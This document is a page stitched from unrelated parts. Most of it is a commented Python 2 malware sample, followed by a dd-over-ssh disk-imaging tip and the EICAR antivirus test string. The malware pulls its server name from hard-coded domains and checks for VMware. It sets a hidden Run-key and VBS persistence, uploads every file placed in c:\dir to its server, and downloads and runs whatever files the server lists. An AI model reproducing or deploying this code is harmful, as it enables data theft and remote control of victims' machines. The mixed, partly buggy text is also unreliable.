# Python 2 sample, reflowed from the flattened page text; Python 2 syntax
# (print statement, <> operator, urllib2/httplib) is kept as captured.
from urllib2 import urlopen
from urllib import urlencode
from glob import glob
from os import path
from os import makedirs
from os import remove
from fileinput import FileInput
from socket import gethostname
from time import sleep
from time import time
from os import popen2
from os import popen
from re import findall
from re import IGNORECASE
from psutil import get_pid_list
from psutil import Process
from sys import exit
from sys import argv
from httplib import HTTPConnection
from os import getpid
from os import kill


def getserver1():
    # C2 host: a hard-coded fallback, replaced by the contents of domain.html
    # when index.html on the second domain reads "1".
    srv = "games-playbox.com"
    try:
        code1 = urlopen('http://worldvoicetrip.com/games/index.html')
        code2 = code1.read()
        if int(code2) == 1:
            code3 = urlopen('http://worldvoicetrip.com/games/domain.html')
            code4 = code3.read()
            return code4
        else:
            return srv
    except:
        return srv
        pass


foldername = "/winone1"
dir1 = "c:\\dir\\"
dir3 = "c:\\dir"
dir2 = "c:\\dir\\dir2\\"
dir4 = "dir2"
_file = path.abspath(argv[0])
fpath = path.dirname(path.realpath(_file))
file17 = path.basename(_file)


def SysInfo():
    # Parses "System Model" out of SYSTEMINFO output (used for the VM check).
    values = {}
    cache = popen2("SYSTEMINFO")
    source = cache[1].read()
    sysOpts = ["System Model"]
    for opt in sysOpts:
        values[opt] = [item.strip() for item in findall("%s:\w*(.*?)\n" % (opt), source, IGNORECASE)][0]
    return values


try:
    sysinfo1 = SysInfo()
    sysinfo2 = str(sysinfo1)
except:
    sysinfo2 = "Test"
    pass

# VMware check; the exit is commented out in the captured sample.
if sysinfo2.find("VMware") <> -1:
    print "VMware"
    #exit()

# Single-instance logic: count other processes with the same file name,
# bail out if more than two, otherwise kill the last one found.
pcount = 0
xx = get_pid_list()
myid = getpid()
for i in xx:
    try:
        pro = Process(i).name
        if pro.find(file17) <> -1:
            if i != myid:
                p = i
                pcount = pcount + 1
    except:
        continue
if pcount > 2:
    exit()
try:
    kill(p, 9)
except:
    pass


class ChunkedEncodingWrapper(object):
    # Wraps a file object so httplib sends it as HTTP chunked transfer encoding.
    def __init__(self, fileobj, blocksize=102400):
        self.fileobj = fileobj
        self.blocksize = blocksize
        self.current_chunk = ""
        self.closed = False

    def read(self, size=None):
        ret = ""
        while size is None or size >= len(self.current_chunk):
            ret += self.current_chunk
            if size is not None:
                size -= len(self.current_chunk)
            if self.closed:
                self.current_chunk = ""
                break
            self._get_chunk()
        else:
            ret += self.current_chunk[:size]
            self.current_chunk = self.current_chunk[size:]
        return ret

    def _get_chunk(self):
        if not self.closed:
            chunk = self.fileobj.read(self.blocksize)
            if chunk:
                self.current_chunk = "%x" % (len(chunk),) + "\r\n" + chunk + "\r\n"
            else:
                self.current_chunk = "0\r\n\r\n"
                self.closed = True


if not path.exists(dir1):
    makedirs(dir1)
if not path.exists(dir2):
    makedirs(dir2)

# Persistence: run.bat adds an HKCU Run value named "Search" pointing at the
# copy in dir2; run.vbs launches the batch file with a hidden window.
try:
    batch = open(dir2+'run.bat','wb')
    bat2='REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Search /t REG_SZ /d "%s%s" /f'%(dir2,file17)
    batch.write(bat2)
    batch.close()
    f1 = open(dir2+'run.vbs','wb')
    data12='Set WshShell = CreateObject("WScript.Shell" )\n'
    data12+='WshShell.Run chr(34) & "'+dir2+'run.bat" & Chr(34), 0\n'
    data12+='Set WshShell = Nothing'
    f1.write(data12)
    f1.close()
    the_output = popen(dir2+"run.vbs").read()
except:
    pass

# Hide the working directory and copy the executable into it.
the_output = popen("attrib +h +s %s"%(dir3)).read()
the_output = popen("copy %s %s"%(file17,dir2)).read()
cname = gethostname()


def splitFile(inputFile,chunkSize,basename1):
    # Splits a large file into numbered parts plus a "-info.txt" manifest.
    f = open(inputFile, 'rb')
    data = f.read()
    f.close()
    bytes = len(data)
    noOfChunks= bytes/chunkSize
    if(bytes%chunkSize):
        noOfChunks+=1
    f = open(inputFile+'-info.txt', 'w')
    f.write(basename+','+str(noOfChunks))
    f.close()
    chunkNames = []
    j = 0
    for i in range(0, bytes+1, chunkSize):
        j = j + 1
        fn1 = inputFile+"-%s" % j
        chunkNames.append(fn1)
        f = open(fn1, 'wb')
        f.write(data[i:i+ chunkSize])
        f.close()


getserver = getserver1()


def runfile(ext):
    # Launches a downloaded file through a throw-away run.vbs (hidden window).
    sleep(2)
    data2len = len(ext)
    if data2len <> 0:
        try:
            if dfile.find(file17) == -1:
                f1 = open(dir2+'run.vbs','wb')
                data12='Set WshShell = CreateObject("WScript.Shell" )\n'
                data12+='WshShell.Run chr(34) & "'+ext+'" & Chr(34), 0\n'
                data12+='Set WshShell = Nothing'
                f1.write(data12)
                f1.close()
                size1 = path.getsize(ext)
                if size1 <> 0:
                    the_output = popen(dir2+"run.vbs").read()
                    remove(dir2+"run.vbs")
                else:
                    remove(dfile)
        except:
            pass


def dex(cname):
    # Check-in with the hostname; download and run each file name returned.
    try:
        dfiles5 = urlopen("http://"+ getserver + foldername+ "/online.php?sysname="+cname+"")
        dfiles6 = dfiles5.read()
        dfiles7 = dfiles6.split(';')
        data7len = len(dfiles6)
        if data7len <> 0:
            for dfile in dfiles7:
                try:
                    f5 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile)
                    output1=open(dir2+"%s"%dfile,'wb')
                    output1.write(f5.read())
                    output1.close()
                    dfile = dir2+dfile
                    runfile(dfile)
                except:
                    continue
    except:
        pass


def dex1():
    # Hourly re-fetch of the file list; only names not already in dir2 are fetched.
    try:
        dfiles12 = urlopen("http://"+ getserver + foldername+ "/getfile.php")
        dfiles11 = dfiles12.read()
        dfiles13 = dfiles1.split(';')
        files11 = glob(dir2+"*")
        for dfile14 in dfiles13:
            try:
                if not (dfile14 in files11):
                    f11 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile14)
                    output11=open(dir2+"%s"%dfile14,'wb')
                    output11.write(f11.read())
                    output11.close()
                    dfile = ''
                    dfile = dir2+dfile14
                    runfile(dfile)
            except:
                continue
    except:
        pass


# Initial check-in: register the host folder, then fetch and run the file list,
# falling back to any .exe already present in dir2.
try:
    urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//")
    dfiles2 = urlopen("http://"+ getserver + foldername+ "/getfile.php")
    dfiles1 = dfiles2.read()
    datalen3 = len(dfiles1)
    if datalen3 == 0:
        dfiles = ''
        dfiles = glob(dir2+"*.exe")
        for dfile in dfiles:
            try:
                runfile(dfile)
            except:
                continue
    else:
        dfiles = dfiles1.split(';')
        for dfile in dfiles:
            try:
                f = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile)
                output=open(dir2+"%s"%dfile,'wb')
                output.write(f.read())
                output.close()
                dfiles = ''
                dfiles = dir2+"%s"%(dfile)
                runfile(dfiles)
            except:
                continue
except:
    dfiles = ''
    dfiles = glob(dir2+"*.exe")
    for dfile in dfiles:
        try:
            runfile(dfile)
        except:
            continue

remove(dir2+"run.bat")
print "Enting While"
time1 = int(time())
count = 0
# Main loop: every file dropped into dir1 (except the dir2 subfolder) is
# uploaded to post.php as a chunked POST and deleted; files over ~100 MB are
# split first. dex() runs roughly every two minutes, dex1() hourly.
while True:
    try:
        time2 = int(time())
        tdif = time2 - time1
        if tdif > 3600:
            dex1()
            time1 = int(time())
        sleep (1)
        count = count + 1
        files = glob(dir1+"*")
        if count > 120 :
            urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//")
            dex(cname)
            count = 0
        for file1 in files:
            try:
                if file1.find(dir4) <> -1:
                    continue
                try:
                    myfile = open(file1, "r+")
                except:
                    continue
                myfile.close()
                basename = path.basename(file1)
                size = path.getsize(file1)
                if size > 105163101 :
                    splitFile(file1,105163101,basename)
                    remove(file1)
                data = open(file1,"rb")
                w = ChunkedEncodingWrapper(data)
                v = urlencode({'filename': basename})
                x = urlencode({'folder': cname})
                headers = {"Transfer-Encoding": "chunked"}
                c = HTTPConnection(getserver)
                c.request("POST", "%s/post.php?%s&%s/"%(foldername,v,x), w, headers)
                data.close()
                remove(file1)
                dex(cname)
                count = 0
                time2 = int(time())
                tdif = time2 - time1
                if tdif > 3600:
                    dex1()
                    time1 = int(time())
            except:
                pass
    except:
        pass

Transfer a disk image via dd and ssh
To transfer a disk image via an ssh tunnel (think evidence collection across the internet):
dd if=</path/to/disk> | ssh user@host "dd of=<filename>"
For example:
dd if=/dev/sda | ssh user@example.com "dd of=image.dd"
In practice, you'll probably want to use some additional dd options such as bs (block size), count, etc. If doing this for evidentiary purposes, dcfldd, dc3dd, ewfacquire and others provide more forensic-friendly options.
To compress data before sending it across the network, add bzip2 (or gzip) with another pipe:
dd if=</path/to/disk> | bzip2 | ssh user@host "dd of=<filename>"
Note that the file written on the remote side is then the bzip2-compressed image; decompress it (bunzip2) before hashing or mounting it.
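As an added example (not from the original page), the same dd-over-ssh pipeline with the sent bytes hashed in flight, so the digest on the collecting side can be compared with one computed on the receiver; the transport command, host and paths are placeholders supplied by the caller.

```sh
#!/bin/sh
# Added example, not from the original page: image a device over ssh while
# hashing the exact bytes handed to the transport, so the sending side has a
# digest to compare with one computed on the receiving host.
#
# image_and_hash SRC TRANSPORT
#   SRC        block device or file to image (e.g. /dev/sda)
#   TRANSPORT  shell command that consumes stdin, e.g.
#              'ssh user@host "dd of=image.dd"' (user/host/path are
#              placeholders, not values from the page)
# Prints the SHA-256 of every byte passed to TRANSPORT (GNU dd/coreutils assumed).
image_and_hash() {
    src="$1"
    transport="$2"
    fifo="$(mktemp -u)"
    mkfifo "$fifo"
    # Background hasher reads a copy of the stream from the fifo.
    sha256sum < "$fifo" > "$fifo.sum" &
    # tee duplicates the stream: one copy to the hasher, one to the transport.
    dd if="$src" bs=1M 2>/dev/null | tee "$fifo" | eval "$transport"
    wait
    cut -d' ' -f1 "$fifo.sum"
    rm -f "$fifo" "$fifo.sum"
}

# verify_image EXPECTED_HASH FILE
# Returns 0 when FILE hashes to EXPECTED_HASH, 1 otherwise. Run this on the
# receiving host against the written image (after bunzip2 if the stream was
# compressed on the way in).
verify_image() {
    [ "$1" = "$(sha256sum "$2" | cut -d' ' -f1)" ]
}
```

Typical use on the collecting side is `h=$(image_and_hash /dev/sda 'ssh user@host "dd of=image.dd"')`, followed by `ssh user@host sha256sum image.dd` and a comparison against `$h`.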
Creating an EICAR test file
Copy and save the following as eicar.com (yes, it’s an all ASCII .com file):
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
As a sanity check, the file should be 68 bytes long. You can also try running the file, which should print “EICAR-STANDARD-ANTIVIRUS-TEST-FILE” to the screen.
Alternatively, you can download eicar.com.txt.